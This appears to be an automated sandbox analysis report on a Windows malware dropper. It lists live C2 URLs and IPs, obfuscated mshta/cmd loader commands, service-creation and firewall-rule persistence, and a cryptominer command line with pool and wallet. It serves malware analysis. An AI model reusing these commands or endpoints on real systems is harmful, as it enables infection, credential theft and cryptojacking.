Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    374s
  • max time network
    1829s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    09-07-2021 14:08

General

  • Target

    toolspab2 (16).exe

  • Size

    315KB

  • MD5

    1d20e1f65938e837ef1b88f10f1bd6c3

  • SHA1

    703d7098dbfc476d2181b7fc041cc23e49c368f1

  • SHA256

    05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d

  • SHA512

    f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1

C2

45.32.235.238:45555

Extracted

Family

redline

Botnet

YTMaloy

C2

87.251.71.125:80

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

C2

82.202.161.37:26317

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 25 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 15 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe
    "C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1852
    • C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe
      "C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"
      2⤵
      • Loads dropped DLL
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1556
  • C:\Users\Admin\AppData\Local\Temp\EF3F.exe
    C:\Users\Admin\AppData\Local\Temp\EF3F.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:1108
  • C:\Users\Admin\AppData\Local\Temp\F26B.exe
    C:\Users\Admin\AppData\Local\Temp\F26B.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:1480
  • C:\Users\Admin\AppData\Local\Temp\4E60.exe
    C:\Users\Admin\AppData\Local\Temp\4E60.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Users\Admin\AppData\Local\Temp\4E60.exe
      C:\Users\Admin\AppData\Local\Temp\4E60.exe
      2⤵
      • Executes dropped EXE
      PID:960
  • C:\Users\Admin\AppData\Local\Temp\52B5.exe
    C:\Users\Admin\AppData\Local\Temp\52B5.exe
    1⤵
    • Executes dropped EXE
    PID:664
  • C:\Users\Admin\AppData\Local\Temp\5564.exe
    C:\Users\Admin\AppData\Local\Temp\5564.exe
    1⤵
    • Executes dropped EXE
    PID:1140
  • C:\Users\Admin\AppData\Local\Temp\5E3C.exe
    C:\Users\Admin\AppData\Local\Temp\5E3C.exe
    1⤵
    • Executes dropped EXE
    PID:1004
  • C:\Users\Admin\AppData\Local\Temp\6657.exe
    C:\Users\Admin\AppData\Local\Temp\6657.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:1668
  • C:\Users\Admin\AppData\Local\Temp\7537.exe
    C:\Users\Admin\AppData\Local\Temp\7537.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    PID:1636
    • C:\Users\Admin\AppData\Local\Temp\7537.exe
      C:\Users\Admin\AppData\Local\Temp\7537.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1160
  • C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    1⤵
      PID:1680
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      1⤵
        PID:1608
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        1⤵
          PID:1612
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe
          1⤵
            PID:2040
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            1⤵
              PID:2024
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:1268
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:108
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:1172
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:1976
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {16FCA353-E38A-4950-815A-D267C8DEA8A5} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
                      1⤵
                        PID:820
                        • C:\Users\Admin\AppData\Roaming\ibcdbjh
                          C:\Users\Admin\AppData\Roaming\ibcdbjh
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:432
                          • C:\Users\Admin\AppData\Roaming\ibcdbjh
                            C:\Users\Admin\AppData\Roaming\ibcdbjh
                            3⤵
                            • Executes dropped EXE
                            PID:860
                        • C:\Users\Admin\AppData\Local\41132072-636a-459b-8580-589f5110769c\549E.exe
                          C:\Users\Admin\AppData\Local\41132072-636a-459b-8580-589f5110769c\549E.exe --Task
                          2⤵
                            PID:1948
                          • C:\Users\Admin\AppData\Roaming\ttcdbjh
                            C:\Users\Admin\AppData\Roaming\ttcdbjh
                            2⤵
                              PID:1816
                            • C:\Users\Admin\AppData\Roaming\ibcdbjh
                              C:\Users\Admin\AppData\Roaming\ibcdbjh
                              2⤵
                                PID:3044
                            • C:\Users\Admin\AppData\Local\Temp\549E.exe
                              C:\Users\Admin\AppData\Local\Temp\549E.exe
                              1⤵
                              • Executes dropped EXE
                              PID:752
                              • C:\Users\Admin\AppData\Local\Temp\549E.exe
                                C:\Users\Admin\AppData\Local\Temp\549E.exe
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Adds Run key to start application
                                • Modifies system certificate store
                                PID:1680
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Users\Admin\AppData\Local\41132072-636a-459b-8580-589f5110769c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                  3⤵
                                  • Modifies file permissions
                                  PID:464
                                • C:\Users\Admin\AppData\Local\Temp\549E.exe
                                  "C:\Users\Admin\AppData\Local\Temp\549E.exe" --Admin IsNotAutoStart IsNotTask
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of NtCreateThreadExHideFromDebugger
                                  • Suspicious use of SetThreadContext
                                  PID:1700
                                  • C:\Users\Admin\AppData\Local\Temp\549E.exe
                                    "C:\Users\Admin\AppData\Local\Temp\549E.exe" --Admin IsNotAutoStart IsNotTask
                                    4⤵
                                      PID:940
                              • C:\Users\Admin\AppData\Local\Temp\5FE5.exe
                                C:\Users\Admin\AppData\Local\Temp\5FE5.exe
                                1⤵
                                • Executes dropped EXE
                                PID:1852
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" vBSCRIPt: CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ). Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\5FE5.exe"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF """" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\5FE5.exe"" ) do taskkill -iM ""%~NxE"" -f " , 0 , TRuE ) )
                                  2⤵
                                    PID:976
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\5FE5.exe" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF "" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\5FE5.exe" ) do taskkill -iM "%~NxE" -f
                                      3⤵
                                        PID:1636
                                        • C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE
                                          ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS
                                          4⤵
                                          • Executes dropped EXE
                                          PID:1768
                                          • C:\Windows\SysWOW64\mshta.exe
                                            "C:\Windows\System32\mshta.exe" vBSCRIPt: CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ). Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF ""/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS "" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ) do taskkill -iM ""%~NxE"" -f " , 0 , TRuE ) )
                                            5⤵
                                              PID:1544
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF "/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS " == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ) do taskkill -iM "%~NxE" -f
                                                6⤵
                                                  PID:1632
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" VBscRipt: clOSe ( CreATeobJECT ( "WScRIpT.SHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = ""MZ"" > P6JDQwUY.2 & COPY /B /y P6JDQwUY.2 + JRtfD7.X + DYta.ASk + I6sjWDN.8 + M0GT.7_ +XVLAANmN.HX ..\FRKN5p.zE & sTArt regsvr32 /u ..\FRKN5P.zE /S& dEl /q * " , 0 , TruE ) )
                                                5⤵
                                                • Loads dropped DLL
                                                • Suspicious use of SetThreadContext
                                                • Modifies Internet Explorer settings
                                                PID:752
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = "MZ" > P6JDQwUY.2 & COPY /B /y P6JDQwUY.2 + JRtfD7.X + DYta.ASk + I6sjWDN.8 + M0GT.7_+XVLAANmN.HX ..\FRKN5p.zE& sTArt regsvr32 /u ..\FRKN5P.zE /S& dEl /q *
                                                  6⤵
                                                    PID:1232
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                      7⤵
                                                        PID:1656
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>P6JDQwUY.2"
                                                        7⤵
                                                          PID:1392
                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                          regsvr32 /u ..\FRKN5P.zE /S
                                                          7⤵
                                                            PID:1700
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill -iM "5FE5.exe" -f
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1620
                                              • C:\Users\Admin\AppData\Local\Temp\75E5.exe
                                                C:\Users\Admin\AppData\Local\Temp\75E5.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:816
                                                • C:\Users\Admin\AppData\Local\Temp\is-0TPOC.tmp\75E5.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-0TPOC.tmp\75E5.tmp" /SL5="$10196,188175,104448,C:\Users\Admin\AppData\Local\Temp\75E5.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:1644
                                                  • C:\Users\Admin\AppData\Local\Temp\is-JGQL4.tmp\134 Vaporeondè_éçè_)))_.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-JGQL4.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:2004
                                                    • C:\Program Files\Windows Mail\TJYEFYPSYG\irecord.exe
                                                      "C:\Program Files\Windows Mail\TJYEFYPSYG\irecord.exe" /VERYSILENT
                                                      4⤵
                                                        PID:2172
                                                        • C:\Users\Admin\AppData\Local\Temp\is-6UT4E.tmp\irecord.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-6UT4E.tmp\irecord.tmp" /SL5="$701B0,5808768,66560,C:\Program Files\Windows Mail\TJYEFYPSYG\irecord.exe" /VERYSILENT
                                                          5⤵
                                                            PID:2232
                                                            • C:\Program Files (x86)\i-record\I-Record.exe
                                                              "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                              6⤵
                                                                PID:2432
                                                          • C:\Users\Admin\AppData\Local\Temp\7c-9b057-529-d3c93-63020fd0f87ce\Raehidiwovu.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\7c-9b057-529-d3c93-63020fd0f87ce\Raehidiwovu.exe"
                                                            4⤵
                                                              PID:2152
                                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                                "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                5⤵
                                                                  PID:2668
                                                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:275457 /prefetch:2
                                                                    6⤵
                                                                      PID:2052
                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:1651722 /prefetch:2
                                                                      6⤵
                                                                        PID:2640
                                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:1258514 /prefetch:2
                                                                        6⤵
                                                                          PID:2932
                                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:1192997 /prefetch:2
                                                                          6⤵
                                                                            PID:1684
                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:930845 /prefetch:2
                                                                            6⤵
                                                                              PID:1800
                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                            5⤵
                                                                              PID:2684
                                                                            • C:\Program Files\Internet Explorer\iexplore.exe
                                                                              "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
                                                                              5⤵
                                                                                PID:2552
                                                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
                                                                                5⤵
                                                                                  PID:2748
                                                                              • C:\Users\Admin\AppData\Local\Temp\86-85bd1-94d-caaba-32d1ee0ee0217\Pyzhahagyce.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\86-85bd1-94d-caaba-32d1ee0ee0217\Pyzhahagyce.exe"
                                                                                4⤵
                                                                                  PID:2352
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\onav1kxd.uqs\GcleanerEU.exe /eufive & exit
                                                                                    5⤵
                                                                                      PID:2940
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gqz1xsxi.nfw\installer.exe /qn CAMPAIGN="654" & exit
                                                                                      5⤵
                                                                                        PID:1772
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fulorq0w.bmj\google-game.exe & exit
                                                                                        5⤵
                                                                                          PID:2488
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hilrvedo.wne\GcleanerWW.exe /mixone & exit
                                                                                          5⤵
                                                                                            PID:2936
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exe & exit
                                                                                            5⤵
                                                                                              PID:1752
                                                                                              • C:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exe
                                                                                                6⤵
                                                                                                  PID:2416
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exe
                                                                                                    7⤵
                                                                                                      PID:2672
                                                                                        • C:\Users\Admin\AppData\Local\Temp\B788.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\B788.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:1636
                                                                                          • C:\Users\Admin\AppData\Local\Temp\B788.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\B788.exe"
                                                                                            2⤵
                                                                                              PID:2068
                                                                                          • C:\Users\Admin\AppData\Local\Temp\C2BF.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\C2BF.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1528
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\pbkldfrj\
                                                                                              2⤵
                                                                                                PID:544
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uowakbcl.exe" C:\Windows\SysWOW64\pbkldfrj\
                                                                                                2⤵
                                                                                                  PID:544
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  "C:\Windows\System32\sc.exe" create pbkldfrj binPath= "C:\Windows\SysWOW64\pbkldfrj\uowakbcl.exe /d\"C:\Users\Admin\AppData\Local\Temp\C2BF.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                  2⤵
                                                                                                    PID:2060
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    "C:\Windows\System32\sc.exe" description pbkldfrj "wifi internet conection"
                                                                                                    2⤵
                                                                                                      PID:2096
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      "C:\Windows\System32\sc.exe" start pbkldfrj
                                                                                                      2⤵
                                                                                                        PID:2132
                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                        2⤵
                                                                                                          PID:2176
                                                                                                      • C:\Windows\SysWOW64\pbkldfrj\uowakbcl.exe
                                                                                                        C:\Windows\SysWOW64\pbkldfrj\uowakbcl.exe /d"C:\Users\Admin\AppData\Local\Temp\C2BF.exe"
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:2160
                                                                                                        • C:\Windows\SysWOW64\svchost.exe
                                                                                                          svchost.exe
                                                                                                          2⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:2360
                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                            svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                            3⤵
                                                                                                              PID:2920
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F65D.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\F65D.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies system certificate store
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2216
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                            2⤵
                                                                                                              PID:2616
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /f /im chrome.exe
                                                                                                                3⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:2648
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A3C.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\A3C.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2436
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\F3FF.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\F3FF.exe
                                                                                                            1⤵
                                                                                                              PID:2492

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v6

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • memory/108-143-0x0000000000090000-0x0000000000094000-memory.dmp

                                                                                                              Filesize

                                                                                                              16KB

                                                                                                            • memory/108-145-0x0000000000080000-0x0000000000089000-memory.dmp

                                                                                                              Filesize

                                                                                                              36KB

                                                                                                            • memory/664-92-0x00000000004A0000-0x0000000000531000-memory.dmp

                                                                                                              Filesize

                                                                                                              580KB

                                                                                                            • memory/664-93-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                                                              Filesize

                                                                                                              584KB

                                                                                                            • memory/752-171-0x00000000004E0000-0x00000000005FB000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.1MB

                                                                                                            • memory/816-185-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                              Filesize

                                                                                                              128KB

                                                                                                            • memory/960-88-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                              Filesize

                                                                                                              120KB

                                                                                                            • memory/960-84-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                              Filesize

                                                                                                              120KB

                                                                                                            • memory/1160-132-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                              Filesize

                                                                                                              120KB

                                                                                                            • memory/1160-142-0x0000000000CF0000-0x0000000000CF1000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/1160-135-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                              Filesize

                                                                                                              120KB

                                                                                                            • memory/1172-147-0x00000000000F0000-0x00000000000F5000-memory.dmp

                                                                                                              Filesize

                                                                                                              20KB

                                                                                                            • memory/1172-148-0x00000000000E0000-0x00000000000E9000-memory.dmp

                                                                                                              Filesize

                                                                                                              36KB

                                                                                                            • memory/1208-64-0x0000000002B10000-0x0000000002B27000-memory.dmp

                                                                                                              Filesize

                                                                                                              92KB

                                                                                                            • memory/1208-144-0x0000000002960000-0x0000000002976000-memory.dmp

                                                                                                              Filesize

                                                                                                              88KB

                                                                                                            • memory/1268-138-0x0000000000060000-0x000000000006C000-memory.dmp

                                                                                                              Filesize

                                                                                                              48KB

                                                                                                            • memory/1268-137-0x0000000000070000-0x0000000000076000-memory.dmp

                                                                                                              Filesize

                                                                                                              24KB

                                                                                                            • memory/1528-241-0x0000000000220000-0x0000000000233000-memory.dmp

                                                                                                              Filesize

                                                                                                              76KB

                                                                                                            • memory/1528-243-0x0000000000400000-0x0000000000451000-memory.dmp

                                                                                                              Filesize

                                                                                                              324KB

                                                                                                            • memory/1556-59-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                              Filesize

                                                                                                              48KB

                                                                                                            • memory/1556-62-0x0000000074F31000-0x0000000074F33000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/1608-111-0x0000000000060000-0x000000000006C000-memory.dmp

                                                                                                              Filesize

                                                                                                              48KB

                                                                                                            • memory/1608-110-0x0000000000070000-0x0000000000077000-memory.dmp

                                                                                                              Filesize

                                                                                                              28KB

                                                                                                            • memory/1612-118-0x00000000000C0000-0x00000000000CB000-memory.dmp

                                                                                                              Filesize

                                                                                                              44KB

                                                                                                            • memory/1612-114-0x0000000071A31000-0x0000000071A33000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/1612-117-0x00000000000D0000-0x00000000000D7000-memory.dmp

                                                                                                              Filesize

                                                                                                              28KB

                                                                                                            • memory/1636-127-0x0000000000960000-0x0000000000993000-memory.dmp

                                                                                                              Filesize

                                                                                                              204KB

                                                                                                            • memory/1636-109-0x0000000004790000-0x0000000004791000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/1636-101-0x0000000000E00000-0x0000000000E01000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/1636-237-0x0000000000400000-0x0000000000D41000-memory.dmp

                                                                                                              Filesize

                                                                                                              9.3MB

                                                                                                            • memory/1636-236-0x0000000002B50000-0x0000000003476000-memory.dmp

